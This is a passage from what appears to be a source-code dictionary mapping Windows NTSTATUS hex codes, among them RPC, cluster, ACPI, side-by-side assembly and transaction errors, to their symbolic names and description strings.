("STATUS_CANNOT_BREAK_OPLOCK","The operation did not complete successfully because it would cause an oplock to be broken. The caller has requested that existing oplocks not be broken."), 0xC0009898: ("STATUS_WOW_ASSERTION","WOW Assertion Error."), 0xC000A000: ("STATUS_INVALID_SIGNATURE","The cryptographic signature is invalid."), 0xC000A001: ("STATUS_HMAC_NOT_SUPPORTED","The cryptographic provider does not support HMAC."), 0xC000A010: ("STATUS_IPSEC_QUEUE_OVERFLOW","The IPsec queue overflowed."), 0xC000A011: ("STATUS_ND_QUEUE_OVERFLOW","The neighbor discovery queue overflowed."), 0xC000A012: ("STATUS_HOPLIMIT_EXCEEDED","An Internet Control Message Protocol (ICMP) hop limit exceeded error was received."), 0xC000A013: ("STATUS_PROTOCOL_NOT_SUPPORTED","The protocol is not installed on the local machine."), 0xC000A080: ("STATUS_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED","{Delayed Write Failed} Windows was unable to save all the data for the file %hs; the data has been lost. This error may be caused by network connectivity issues. Try to save this file elsewhere."), 0xC000A081: ("STATUS_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR","{Delayed Write Failed} Windows was unable to save all the data for the file %hs; the data has been lost. This error was returned by the server on which the file exists. Try to save this file elsewhere."), 0xC000A082: ("STATUS_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR","{Delayed Write Failed} Windows was unable to save all the data for the file %hs; the data has been lost. This error may be caused if the device has been removed or the media is write-protected."), 0xC000A083: ("STATUS_XML_PARSE_ERROR","Windows was unable to parse the requested XML data."), 0xC000A084: ("STATUS_XMLDSIG_ERROR","An error was encountered while processing an XML digital signature."), 0xC000A085: ("STATUS_WRONG_COMPARTMENT","This indicates that the caller made the connection request in the wrong routing compartment."), 0xC000A086: ("STATUS_AUTHIP_FAILURE","This indicates that there was an AuthIP failure when attempting to connect to the remote host."), 0xC000A087: ("STATUS_DS_OID_MAPPED_GROUP_CANT_HAVE_MEMBERS","OID mapped groups cannot have members."), 0xC000A088: ("STATUS_DS_OID_NOT_FOUND","The specified OID cannot be found."), 0xC000A100: ("STATUS_HASH_NOT_SUPPORTED","Hash generation for the specified version and hash type is not enabled on server."), 0xC000A101: ("STATUS_HASH_NOT_PRESENT","The hash requests is not present or not up to date with the current file contents."), 0xC0010001: ("DBG_NO_STATE_CHANGE","The debugger did not perform a state change."), 0xC0010002: ("DBG_APP_NOT_IDLE","The debugger found that the application is not idle."), 0xC0020001: ("RPC_NT_INVALID_STRING_BINDING","The string binding is invalid."), 0xC0020002: ("RPC_NT_WRONG_KIND_OF_BINDING","The binding handle is not the correct type."), 0xC0020003: ("RPC_NT_INVALID_BINDING","The binding handle is invalid."), 0xC0020004: ("RPC_NT_PROTSEQ_NOT_SUPPORTED","The RPC protocol sequence is not supported."), 0xC0020005: ("RPC_NT_INVALID_RPC_PROTSEQ","The RPC protocol sequence is invalid."), 0xC0020006: ("RPC_NT_INVALID_STRING_UUID","The string UUID is invalid."), 0xC0020007: ("RPC_NT_INVALID_ENDPOINT_FORMAT","The endpoint format is invalid."), 0xC0020008: ("RPC_NT_INVALID_NET_ADDR","The network address is invalid."), 0xC0020009: ("RPC_NT_NO_ENDPOINT_FOUND","No endpoint was found."), 0xC002000A: ("RPC_NT_INVALID_TIMEOUT","The time-out value is invalid."), 0xC002000B: ("RPC_NT_OBJECT_NOT_FOUND","The object UUID was not found."), 0xC002000C: ("RPC_NT_ALREADY_REGISTERED","The object UUID has already been registered."), 0xC002000D: ("RPC_NT_TYPE_ALREADY_REGISTERED","The type UUID has already been registered."), 0xC002000E: ("RPC_NT_ALREADY_LISTENING","The RPC server is already listening."), 0xC002000F: ("RPC_NT_NO_PROTSEQS_REGISTERED","No protocol sequences have been registered."), 0xC0020010: ("RPC_NT_NOT_LISTENING","The RPC server is not listening."), 0xC0020011: ("RPC_NT_UNKNOWN_MGR_TYPE","The manager type is unknown."), 0xC0020012: ("RPC_NT_UNKNOWN_IF","The interface is unknown."), 0xC0020013: ("RPC_NT_NO_BINDINGS","There are no bindings."), 0xC0020014: ("RPC_NT_NO_PROTSEQS","There are no protocol sequences."), 0xC0020015: ("RPC_NT_CANT_CREATE_ENDPOINT","The endpoint cannot be created."), 0xC0020016: ("RPC_NT_OUT_OF_RESOURCES","Insufficient resources are available to complete this operation."), 0xC0020017: ("RPC_NT_SERVER_UNAVAILABLE","The RPC server is unavailable."), 0xC0020018: ("RPC_NT_SERVER_TOO_BUSY","The RPC server is too busy to complete this operation."), 0xC0020019: ("RPC_NT_INVALID_NETWORK_OPTIONS","The network options are invalid."), 0xC002001A: ("RPC_NT_NO_CALL_ACTIVE","No RPCs are active on this thread."), 0xC002001B: ("RPC_NT_CALL_FAILED","The RPC failed."), 0xC002001C: ("RPC_NT_CALL_FAILED_DNE","The RPC failed and did not execute."), 0xC002001D: ("RPC_NT_PROTOCOL_ERROR","An RPC protocol error occurred."), 0xC002001F: ("RPC_NT_UNSUPPORTED_TRANS_SYN","The RPC server does not support the transfer syntax."), 0xC0020021: ("RPC_NT_UNSUPPORTED_TYPE","The type UUID is not supported."), 0xC0020022: ("RPC_NT_INVALID_TAG","The tag is invalid."), 0xC0020023: ("RPC_NT_INVALID_BOUND","The array bounds are invalid."), 0xC0020024: ("RPC_NT_NO_ENTRY_NAME","The binding does not contain an entry name."), 0xC0020025: ("RPC_NT_INVALID_NAME_SYNTAX","The name syntax is invalid."), 0xC0020026: ("RPC_NT_UNSUPPORTED_NAME_SYNTAX","The name syntax is not supported."), 0xC0020028: ("RPC_NT_UUID_NO_ADDRESS","No network address is available to construct a UUID."), 0xC0020029: ("RPC_NT_DUPLICATE_ENDPOINT","The endpoint is a duplicate."), 0xC002002A: ("RPC_NT_UNKNOWN_AUTHN_TYPE","The authentication type is unknown."), 0xC002002B: ("RPC_NT_MAX_CALLS_TOO_SMALL","The maximum number of calls is too small."), 0xC002002C: ("RPC_NT_STRING_TOO_LONG","The string is too long."), 0xC002002D: ("RPC_NT_PROTSEQ_NOT_FOUND","The RPC protocol sequence was not found."), 0xC002002E: ("RPC_NT_PROCNUM_OUT_OF_RANGE","The procedure number is out of range."), 0xC002002F: ("RPC_NT_BINDING_HAS_NO_AUTH","The binding does not contain any authentication information."), 0xC0020030: ("RPC_NT_UNKNOWN_AUTHN_SERVICE","The authentication service is unknown."), 0xC0020031: ("RPC_NT_UNKNOWN_AUTHN_LEVEL","The authentication level is unknown."), 0xC0020032: ("RPC_NT_INVALID_AUTH_IDENTITY","The security context is invalid."), 0xC0020033: ("RPC_NT_UNKNOWN_AUTHZ_SERVICE","The authorization service is unknown."), 0xC0020034: ("EPT_NT_INVALID_ENTRY","The entry is invalid."), 0xC0020035: ("EPT_NT_CANT_PERFORM_OP","The operation cannot be performed."), 0xC0020036: ("EPT_NT_NOT_REGISTERED","No more endpoints are available from the endpoint mapper."), 0xC0020037: ("RPC_NT_NOTHING_TO_EXPORT","No interfaces have been exported."), 0xC0020038: ("RPC_NT_INCOMPLETE_NAME","The entry name is incomplete."), 0xC0020039: ("RPC_NT_INVALID_VERS_OPTION","The version option is invalid."), 0xC002003A: ("RPC_NT_NO_MORE_MEMBERS","There are no more members."), 0xC002003B: ("RPC_NT_NOT_ALL_OBJS_UNEXPORTED","There is nothing to unexport."), 0xC002003C: ("RPC_NT_INTERFACE_NOT_FOUND","The interface was not found."), 0xC002003D: ("RPC_NT_ENTRY_ALREADY_EXISTS","The entry already exists."), 0xC002003E: ("RPC_NT_ENTRY_NOT_FOUND","The entry was not found."), 0xC002003F: ("RPC_NT_NAME_SERVICE_UNAVAILABLE","The name service is unavailable."), 0xC0020040: ("RPC_NT_INVALID_NAF_ID","The network address family is invalid."), 0xC0020041: ("RPC_NT_CANNOT_SUPPORT","The requested operation is not supported."), 0xC0020042: ("RPC_NT_NO_CONTEXT_AVAILABLE","No security context is available to allow impersonation."), 0xC0020043: ("RPC_NT_INTERNAL_ERROR","An internal error occurred in the RPC."), 0xC0020044: ("RPC_NT_ZERO_DIVIDE","The RPC server attempted to divide an integer by zero."), 0xC0020045: ("RPC_NT_ADDRESS_ERROR","An addressing error occurred in the RPC server."), 0xC0020046: ("RPC_NT_FP_DIV_ZERO","A floating point operation at the RPC server caused a divide by zero."), 0xC0020047: ("RPC_NT_FP_UNDERFLOW","A floating point underflow occurred at the RPC server."), 0xC0020048: ("RPC_NT_FP_OVERFLOW","A floating point overflow occurred at the RPC server."), 0xC0020049: ("RPC_NT_CALL_IN_PROGRESS","An RPC is already in progress for this thread."), 0xC002004A: ("RPC_NT_NO_MORE_BINDINGS","There are no more bindings."), 0xC002004B: ("RPC_NT_GROUP_MEMBER_NOT_FOUND","The group member was not found."), 0xC002004C: ("EPT_NT_CANT_CREATE","The endpoint mapper database entry could not be created."), 0xC002004D: ("RPC_NT_INVALID_OBJECT","The object UUID is the nil UUID."), 0xC002004F: ("RPC_NT_NO_INTERFACES","No interfaces have been registered."), 0xC0020050: ("RPC_NT_CALL_CANCELLED","The RPC was canceled."), 0xC0020051: ("RPC_NT_BINDING_INCOMPLETE","The binding handle does not contain all the required information."), 0xC0020052: ("RPC_NT_COMM_FAILURE","A communications failure occurred during an RPC."), 0xC0020053: ("RPC_NT_UNSUPPORTED_AUTHN_LEVEL","The requested authentication level is not supported."), 0xC0020054: ("RPC_NT_NO_PRINC_NAME","No principal name was registered."), 0xC0020055: ("RPC_NT_NOT_RPC_ERROR","The error specified is not a valid Windows RPC error code."), 0xC0020057: ("RPC_NT_SEC_PKG_ERROR","A security package-specific error occurred."), 0xC0020058: ("RPC_NT_NOT_CANCELLED","The thread was not canceled."), 0xC0020062: ("RPC_NT_INVALID_ASYNC_HANDLE","Invalid asynchronous RPC handle."), 0xC0020063: ("RPC_NT_INVALID_ASYNC_CALL","Invalid asynchronous RPC call handle for this operation."), 0xC0020064: ("RPC_NT_PROXY_ACCESS_DENIED","Access to the HTTP proxy is denied."), 0xC0030001: ("RPC_NT_NO_MORE_ENTRIES","The list of RPC servers available for auto-handle binding has been exhausted."), 0xC0030002: ("RPC_NT_SS_CHAR_TRANS_OPEN_FAIL","The file designated by DCERPCCHARTRANS cannot be opened."), 0xC0030003: ("RPC_NT_SS_CHAR_TRANS_SHORT_FILE","The file containing the character translation table has fewer than 512 bytes."), 0xC0030004: ("RPC_NT_SS_IN_NULL_CONTEXT","A null context handle is passed as an [in] parameter."), 0xC0030005: ("RPC_NT_SS_CONTEXT_MISMATCH","The context handle does not match any known context handles."), 0xC0030006: ("RPC_NT_SS_CONTEXT_DAMAGED","The context handle changed during a call."), 0xC0030007: ("RPC_NT_SS_HANDLES_MISMATCH","The binding handles passed to an RPC do not match."), 0xC0030008: ("RPC_NT_SS_CANNOT_GET_CALL_HANDLE","The stub is unable to get the call handle."), 0xC0030009: ("RPC_NT_NULL_REF_POINTER","A null reference pointer was passed to the stub."), 0xC003000A: ("RPC_NT_ENUM_VALUE_OUT_OF_RANGE","The enumeration value is out of range."), 0xC003000B: ("RPC_NT_BYTE_COUNT_TOO_SMALL","The byte count is too small."), 0xC003000C: ("RPC_NT_BAD_STUB_DATA","The stub received bad data."), 0xC0030059: ("RPC_NT_INVALID_ES_ACTION","Invalid operation on the encoding/decoding handle."), 0xC003005A: ("RPC_NT_WRONG_ES_VERSION","Incompatible version of the serializing package."), 0xC003005B: ("RPC_NT_WRONG_STUB_VERSION","Incompatible version of the RPC stub."), 0xC003005C: ("RPC_NT_INVALID_PIPE_OBJECT","The RPC pipe object is invalid or corrupt."), 0xC003005D: ("RPC_NT_INVALID_PIPE_OPERATION","An invalid operation was attempted on an RPC pipe object."), 0xC003005E: ("RPC_NT_WRONG_PIPE_VERSION","Unsupported RPC pipe version."), 0xC003005F: ("RPC_NT_PIPE_CLOSED","The RPC pipe object has already been closed."), 0xC0030060: ("RPC_NT_PIPE_DISCIPLINE_ERROR","The RPC call completed before all pipes were processed."), 0xC0030061: ("RPC_NT_PIPE_EMPTY","No more data is available from the RPC pipe."), 0xC0040035: ("STATUS_PNP_BAD_MPS_TABLE","A device is missing in the system BIOS MPS table. This device will not be used. Contact your system vendor for a system BIOS update."), 0xC0040036: ("STATUS_PNP_TRANSLATION_FAILED","A translator failed to translate resources."), 0xC0040037: ("STATUS_PNP_IRQ_TRANSLATION_FAILED","An IRQ translator failed to translate resources."), 0xC0040038: ("STATUS_PNP_INVALID_ID","Driver %2 returned an invalid ID for a child device (%3)."), 0xC0040039: ("STATUS_IO_REISSUE_AS_CACHED","Reissue the given operation as a cached I/O operation"), 0xC00A0001: ("STATUS_CTX_WINSTATION_NAME_INVALID","Session name %1 is invalid."), 0xC00A0002: ("STATUS_CTX_INVALID_PD","The protocol driver %1 is invalid."), 0xC00A0003: ("STATUS_CTX_PD_NOT_FOUND","The protocol driver %1 was not found in the system path."), 0xC00A0006: ("STATUS_CTX_CLOSE_PENDING","A close operation is pending on the terminal connection."), 0xC00A0007: ("STATUS_CTX_NO_OUTBUF","No free output buffers are available."), 0xC00A0008: ("STATUS_CTX_MODEM_INF_NOT_FOUND","The MODEM.INF file was not found."), 0xC00A0009: ("STATUS_CTX_INVALID_MODEMNAME","The modem (%1) was not found in the MODEM.INF file."), 0xC00A000A: ("STATUS_CTX_RESPONSE_ERROR","The modem did not accept the command sent to it. Verify that the configured modem name matches the attached modem."), 0xC00A000B: ("STATUS_CTX_MODEM_RESPONSE_TIMEOUT","The modem did not respond to the command sent to it. Verify that the modem cable is properly attached and the modem is turned on."), 0xC00A000C: ("STATUS_CTX_MODEM_RESPONSE_NO_CARRIER","Carrier detection has failed or the carrier has been dropped due to disconnection."), 0xC00A000D: ("STATUS_CTX_MODEM_RESPONSE_NO_DIALTONE","A dial tone was not detected within the required time. Verify that the phone cable is properly attached and functional."), 0xC00A000E: ("STATUS_CTX_MODEM_RESPONSE_BUSY","A busy signal was detected at a remote site on callback."), 0xC00A000F: ("STATUS_CTX_MODEM_RESPONSE_VOICE","A voice was detected at a remote site on callback."), 0xC00A0010: ("STATUS_CTX_TD_ERROR","Transport driver error."), 0xC00A0012: ("STATUS_CTX_LICENSE_CLIENT_INVALID","The client you are using is not licensed to use this system. Your logon request is denied."), 0xC00A0013: ("STATUS_CTX_LICENSE_NOT_AVAILABLE","The system has reached its licensed logon limit. Try again later."), 0xC00A0014: ("STATUS_CTX_LICENSE_EXPIRED","The system license has expired. Your logon request is denied."), 0xC00A0015: ("STATUS_CTX_WINSTATION_NOT_FOUND","The specified session cannot be found."), 0xC00A0016: ("STATUS_CTX_WINSTATION_NAME_COLLISION","The specified session name is already in use."), 0xC00A0017: ("STATUS_CTX_WINSTATION_BUSY","The requested operation cannot be completed because the terminal connection is currently processing a connect, disconnect, reset, or delete operation."), 0xC00A0018: ("STATUS_CTX_BAD_VIDEO_MODE","An attempt has been made to connect to a session whose video mode is not supported by the current client."), 0xC00A0022: ("STATUS_CTX_GRAPHICS_INVALID","The application attempted to enable DOS graphics mode. DOS graphics mode is not supported."), 0xC00A0024: ("STATUS_CTX_NOT_CONSOLE","The requested operation can be performed only on the system console. This is most often the result of a driver or system DLL requiring direct console access."), 0xC00A0026: ("STATUS_CTX_CLIENT_QUERY_TIMEOUT","The client failed to respond to the server connect message."), 0xC00A0027: ("STATUS_CTX_CONSOLE_DISCONNECT","Disconnecting the console session is not supported."), 0xC00A0028: ("STATUS_CTX_CONSOLE_CONNECT","Reconnecting a disconnected session to the console is not supported."), 0xC00A002A: ("STATUS_CTX_SHADOW_DENIED","The request to control another session remotely was denied."), 0xC00A002B: ("STATUS_CTX_WINSTATION_ACCESS_DENIED","A process has requested access to a session, but has not been granted those access rights."), 0xC00A002E: ("STATUS_CTX_INVALID_WD","The terminal connection driver %1 is invalid."), 0xC00A002F: ("STATUS_CTX_WD_NOT_FOUND","The terminal connection driver %1 was not found in the system path."), 0xC00A0030: ("STATUS_CTX_SHADOW_INVALID","The requested session cannot be controlled remotely. You cannot control your own session, a session that is trying to control your session, a session that has no user logged on, or other sessions from the console."), 0xC00A0031: ("STATUS_CTX_SHADOW_DISABLED","The requested session is not configured to allow remote control."), 0xC00A0032: ("STATUS_RDP_PROTOCOL_ERROR","The RDP protocol component %2 detected an error in the protocol stream and has disconnected the client."), 0xC00A0033: ("STATUS_CTX_CLIENT_LICENSE_NOT_SET","Your request to connect to this terminal server has been rejected. Your terminal server client license number has not been entered for this copy of the terminal client. Contact your system administrator for help in entering a valid, unique license number for this terminal server client. Click OK to continue."), 0xC00A0034: ("STATUS_CTX_CLIENT_LICENSE_IN_USE","Your request to connect to this terminal server has been rejected. Your terminal server client license number is currently being used by another user. Contact your system administrator to obtain a new copy of the terminal server client with a valid, unique license number. Click OK to continue."), 0xC00A0035: ("STATUS_CTX_SHADOW_ENDED_BY_MODE_CHANGE","The remote control of the console was terminated because the display mode was changed. Changing the display mode in a remote control session is not supported."), 0xC00A0036: ("STATUS_CTX_SHADOW_NOT_RUNNING","Remote control could not be terminated because the specified session is not currently being remotely controlled."), 0xC00A0037: ("STATUS_CTX_LOGON_DISABLED","Your interactive logon privilege has been disabled. Contact your system administrator."), 0xC00A0038: ("STATUS_CTX_SECURITY_LAYER_ERROR","The terminal server security layer detected an error in the protocol stream and has disconnected the client."), 0xC00A0039: ("STATUS_TS_INCOMPATIBLE_SESSIONS","The target session is incompatible with the current session."), 0xC00B0001: ("STATUS_MUI_FILE_NOT_FOUND","The resource loader failed to find an MUI file."), 0xC00B0002: ("STATUS_MUI_INVALID_FILE","The resource loader failed to load an MUI file because the file failed to pass validation."), 0xC00B0003: ("STATUS_MUI_INVALID_RC_CONFIG","The RC manifest is corrupted with garbage data, is an unsupported version, or is missing a required item."), 0xC00B0004: ("STATUS_MUI_INVALID_LOCALE_NAME","The RC manifest has an invalid culture name."), 0xC00B0005: ("STATUS_MUI_INVALID_ULTIMATEFALLBACK_NAME","The RC manifest has and invalid ultimate fallback name."), 0xC00B0006: ("STATUS_MUI_FILE_NOT_LOADED","The resource loader cache does not have a loaded MUI entry."), 0xC00B0007: ("STATUS_RESOURCE_ENUM_USER_STOP","The user stopped resource enumeration."), 0xC0130001: ("STATUS_CLUSTER_INVALID_NODE","The cluster node is not valid."), 0xC0130002: ("STATUS_CLUSTER_NODE_EXISTS","The cluster node already exists."), 0xC0130003: ("STATUS_CLUSTER_JOIN_IN_PROGRESS","A node is in the process of joining the cluster."), 0xC0130004: ("STATUS_CLUSTER_NODE_NOT_FOUND","The cluster node was not found."), 0xC0130005: ("STATUS_CLUSTER_LOCAL_NODE_NOT_FOUND","The cluster local node information was not found."), 0xC0130006: ("STATUS_CLUSTER_NETWORK_EXISTS","The cluster network already exists."), 0xC0130007: ("STATUS_CLUSTER_NETWORK_NOT_FOUND","The cluster network was not found."), 0xC0130008: ("STATUS_CLUSTER_NETINTERFACE_EXISTS","The cluster network interface already exists."), 0xC0130009: ("STATUS_CLUSTER_NETINTERFACE_NOT_FOUND","The cluster network interface was not found."), 0xC013000A: ("STATUS_CLUSTER_INVALID_REQUEST","The cluster request is not valid for this object."), 0xC013000B: ("STATUS_CLUSTER_INVALID_NETWORK_PROVIDER","The cluster network provider is not valid."), 0xC013000C: ("STATUS_CLUSTER_NODE_DOWN","The cluster node is down."), 0xC013000D: ("STATUS_CLUSTER_NODE_UNREACHABLE","The cluster node is not reachable."), 0xC013000E: ("STATUS_CLUSTER_NODE_NOT_MEMBER","The cluster node is not a member of the cluster."), 0xC013000F: ("STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS","A cluster join operation is not in progress."), 0xC0130010: ("STATUS_CLUSTER_INVALID_NETWORK","The cluster network is not valid."), 0xC0130011: ("STATUS_CLUSTER_NO_NET_ADAPTERS","No network adapters are available."), 0xC0130012: ("STATUS_CLUSTER_NODE_UP","The cluster node is up."), 0xC0130013: ("STATUS_CLUSTER_NODE_PAUSED","The cluster node is paused."), 0xC0130014: ("STATUS_CLUSTER_NODE_NOT_PAUSED","The cluster node is not paused."), 0xC0130015: ("STATUS_CLUSTER_NO_SECURITY_CONTEXT","No cluster security context is available."), 0xC0130016: ("STATUS_CLUSTER_NETWORK_NOT_INTERNAL","The cluster network is not configured for internal cluster communication."), 0xC0130017: ("STATUS_CLUSTER_POISONED","The cluster node has been poisoned."), 0xC0140001: ("STATUS_ACPI_INVALID_OPCODE","An attempt was made to run an invalid AML opcode."), 0xC0140002: ("STATUS_ACPI_STACK_OVERFLOW","The AML interpreter stack has overflowed."), 0xC0140003: ("STATUS_ACPI_ASSERT_FAILED","An inconsistent state has occurred."), 0xC0140004: ("STATUS_ACPI_INVALID_INDEX","An attempt was made to access an array outside its bounds."), 0xC0140005: ("STATUS_ACPI_INVALID_ARGUMENT","A required argument was not specified."), 0xC0140006: ("STATUS_ACPI_FATAL","A fatal error has occurred."), 0xC0140007: ("STATUS_ACPI_INVALID_SUPERNAME","An invalid SuperName was specified."), 0xC0140008: ("STATUS_ACPI_INVALID_ARGTYPE","An argument with an incorrect type was specified."), 0xC0140009: ("STATUS_ACPI_INVALID_OBJTYPE","An object with an incorrect type was specified."), 0xC014000A: ("STATUS_ACPI_INVALID_TARGETTYPE","A target with an incorrect type was specified."), 0xC014000B: ("STATUS_ACPI_INCORRECT_ARGUMENT_COUNT","An incorrect number of arguments was specified."), 0xC014000C: ("STATUS_ACPI_ADDRESS_NOT_MAPPED","An address failed to translate."), 0xC014000D: ("STATUS_ACPI_INVALID_EVENTTYPE","An incorrect event type was specified."), 0xC014000E: ("STATUS_ACPI_HANDLER_COLLISION","A handler for the target already exists."), 0xC014000F: ("STATUS_ACPI_INVALID_DATA","Invalid data for the target was specified."), 0xC0140010: ("STATUS_ACPI_INVALID_REGION","An invalid region for the target was specified."), 0xC0140011: ("STATUS_ACPI_INVALID_ACCESS_SIZE","An attempt was made to access a field outside the defined range."), 0xC0140012: ("STATUS_ACPI_ACQUIRE_GLOBAL_LOCK","The global system lock could not be acquired."), 0xC0140013: ("STATUS_ACPI_ALREADY_INITIALIZED","An attempt was made to reinitialize the ACPI subsystem."), 0xC0140014: ("STATUS_ACPI_NOT_INITIALIZED","The ACPI subsystem has not been initialized."), 0xC0140015: ("STATUS_ACPI_INVALID_MUTEX_LEVEL","An incorrect mutex was specified."), 0xC0140016: ("STATUS_ACPI_MUTEX_NOT_OWNED","The mutex is not currently owned."), 0xC0140017: ("STATUS_ACPI_MUTEX_NOT_OWNER","An attempt was made to access the mutex by a process that was not the owner."), 0xC0140018: ("STATUS_ACPI_RS_ACCESS","An error occurred during an access to region space."), 0xC0140019: ("STATUS_ACPI_INVALID_TABLE","An attempt was made to use an incorrect table."), 0xC0140020: ("STATUS_ACPI_REG_HANDLER_FAILED","The registration of an ACPI event failed."), 0xC0140021: ("STATUS_ACPI_POWER_REQUEST_FAILED","An ACPI power object failed to transition state."), 0xC0150001: ("STATUS_SXS_SECTION_NOT_FOUND","The requested section is not present in the activation context."), 0xC0150002: ("STATUS_SXS_CANT_GEN_ACTCTX","Windows was unble to process the application binding information. Refer to the system event log for further information."), 0xC0150003: ("STATUS_SXS_INVALID_ACTCTXDATA_FORMAT","The application binding data format is invalid."), 0xC0150004: ("STATUS_SXS_ASSEMBLY_NOT_FOUND","The referenced assembly is not installed on the system."), 0xC0150005: ("STATUS_SXS_MANIFEST_FORMAT_ERROR","The manifest file does not begin with the required tag and format information."), 0xC0150006: ("STATUS_SXS_MANIFEST_PARSE_ERROR","The manifest file contains one or more syntax errors."), 0xC0150007: ("STATUS_SXS_ACTIVATION_CONTEXT_DISABLED","The application attempted to activate a disabled activation context."), 0xC0150008: ("STATUS_SXS_KEY_NOT_FOUND","The requested lookup key was not found in any active activation context."), 0xC0150009: ("STATUS_SXS_VERSION_CONFLICT","A component version required by the application conflicts with another component version that is already active."), 0xC015000A: ("STATUS_SXS_WRONG_SECTION_TYPE","The type requested activation context section does not match the query API used."), 0xC015000B: ("STATUS_SXS_THREAD_QUERIES_DISABLED","Lack of system resources has required isolated activation to be disabled for the current thread of execution."), 0xC015000C: ("STATUS_SXS_ASSEMBLY_MISSING","The referenced assembly could not be found."), 0xC015000E: ("STATUS_SXS_PROCESS_DEFAULT_ALREADY_SET","An attempt to set the process default activation context failed because the process default activation context was already set."), 0xC015000F: ("STATUS_SXS_EARLY_DEACTIVATION","The activation context being deactivated is not the most recently activated one."), 0xC0150010: ("STATUS_SXS_INVALID_DEACTIVATION","The activation context being deactivated is not active for the current thread of execution."), 0xC0150011: ("STATUS_SXS_MULTIPLE_DEACTIVATION","The activation context being deactivated has already been deactivated."), 0xC0150012: ("STATUS_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY","The activation context of the system default assembly could not be generated."), 0xC0150013: ("STATUS_SXS_PROCESS_TERMINATION_REQUESTED","A component used by the isolation facility has requested that the process be terminated."), 0xC0150014: ("STATUS_SXS_CORRUPT_ACTIVATION_STACK","The activation context activation stack for the running thread of execution is corrupt."), 0xC0150015: ("STATUS_SXS_CORRUPTION","The application isolation metadata for this process or thread has become corrupt."), 0xC0150016: ("STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE","The value of an attribute in an identity is not within the legal range."), 0xC0150017: ("STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME","The name of an attribute in an identity is not within the legal range."), 0xC0150018: ("STATUS_SXS_IDENTITY_DUPLICATE_ATTRIBUTE","An identity contains two definitions for the same attribute."), 0xC0150019: ("STATUS_SXS_IDENTITY_PARSE_ERROR","The identity string is malformed. This may be due to a trailing comma, more than two unnamed attributes, a missing attribute name, or a missing attribute value."), 0xC015001A: ("STATUS_SXS_COMPONENT_STORE_CORRUPT","The component store has become corrupted."), 0xC015001B: ("STATUS_SXS_FILE_HASH_MISMATCH","A component's file does not match the verification information present in the component manifest."), 0xC015001C: ("STATUS_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT","The identities of the manifests are identical, but their contents are different."), 0xC015001D: ("STATUS_SXS_IDENTITIES_DIFFERENT","The component identities are different."), 0xC015001E: ("STATUS_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT","The assembly is not a deployment."), 0xC015001F: ("STATUS_SXS_FILE_NOT_PART_OF_ASSEMBLY","The file is not a part of the assembly."), 0xC0150020: ("STATUS_ADVANCED_INSTALLER_FAILED","An advanced installer failed during setup or servicing."), 0xC0150021: ("STATUS_XML_ENCODING_MISMATCH","The character encoding in the XML declaration did not match the encoding used in the document."), 0xC0150022: ("STATUS_SXS_MANIFEST_TOO_BIG","The size of the manifest exceeds the maximum allowed."), 0xC0150023: ("STATUS_SXS_SETTING_NOT_REGISTERED","The setting is not registered."), 0xC0150024: ("STATUS_SXS_TRANSACTION_CLOSURE_INCOMPLETE","One or more required transaction members are not present."), 0xC0150025: ("STATUS_SMI_PRIMITIVE_INSTALLER_FAILED","The SMI primitive installer failed during setup or servicing."), 0xC0150026: ("STATUS_GENERIC_COMMAND_FAILED","A generic command executable returned a result that indicates failure."), 0xC0150027: ("STATUS_SXS_FILE_HASH_MISSING","A component is missing file verification information in its manifest."), 0xC0190001: ("STATUS_TRANSACTIONAL_CONFLICT","The function attempted to use a name that is reserved for use by another transaction."), 0xC0190002: ("STATUS_INVALID_TRANSACTION","The transaction handle associated with this operation is invalid."), 0xC0190003: ("STATUS_TRANSACTION_NOT_ACTIVE","The requested operation was made in the context of a transaction that is no longer active."), 0xC0190004: ("STATUS_TM_INITIALIZATION_FAILED","The transaction manager was unable to be successfully initialized. Transacted operations are not supported."), 0xC0190005: ("STATUS_RM_NOT_ACTIVE","Transaction support within the specified file system resource manager was not started or was shut down due to an error."), 0xC0190006: ("STATUS_RM_METADATA_CORRUPT","The metadata of the resource manager has been corrupted. The resource manager will not function."), 0xC0190007: ("STATUS_TRANSACTION_NOT_JOINED","The resource manager attempted to prepare a transaction that it has not successfully joined."), 0xC0190008: ("STATUS_DIRECTORY_NOT_RM","The specified directory does not contain a file system resource manager."), 0xC019000A: ("STATUS_TRANSACTIONS_UNSUPPORTED_REMOTE","The remote server or share does not support transacted file operations."), 0xC019000B: ("STATUS_LOG_RESIZE_INVALID_SIZE","The requested log size for the file system resource manager is invalid."), 0xC019000C: ("STATUS_REMOTE_FILE_VERSION_MISMATCH","The remote server sent mismatching version number or Fid for a file opened with transactions."), 0xC019000F: ("STATUS_CRM_PROTOCOL_ALREADY_EXISTS","The resource manager tried to register a protocol that already exists."), 0xC0190010: ("STATUS_TRANSACTION_PROPAGATION_FAILED","The attempt to propagate the transaction failed."), 0xC0190011: ("STATUS_CRM_PROTOCOL_NOT_FOUND","The requested propagation protocol was not registered as a CRM."), 0xC0190012: ("STATUS_TRANSACTION_SUPERIOR_EXISTS","The transaction object already has a superior enlistment, and the caller attempted an operation that would have created a new superior. Only a single superior enlistment is allowed."), 0xC0190013: ("STATUS_TRANSACTION_REQUEST_NOT_VALID","The requested operation is not valid on the transaction object in its current state."), 0xC0190014: ("STATUS_TRANSACTION_NOT_REQUESTED","The caller has called a response API, but the response is not expected because the transaction manager did not issue the corresponding request to the caller."), 0xC0190015: ("STATUS_TRANSACTION_ALREADY_ABORTED","It is too late to perform the requested operation, because the transaction has already been aborted."), 0xC0190016: ("STATUS_TRANSACTION_ALREADY_COMMITTED","It is too late to perform the requested operation, because the transaction has already been committed."), 0xC0190017: ("STATUS_TRANSACTION_INVALID_MARSHALL_BUFFER","The buffer passed in to NtPushTransaction or NtPullTransaction is not in a valid format."), 0xC0190018: ("STATUS_CURRENT_TRANSACTION_NOT_VALID","The current transaction context associated with the thread is not a valid handle to a transaction object."), 0xC0190019: ("STATUS_LOG_GROWTH_FAILED","An attempt to create space in the transactional resource manager's log failed. The failure status has been recorded in the event log."), 0xC0190021: ("STATUS_OBJECT_NO_LONGER_EXISTS","The object 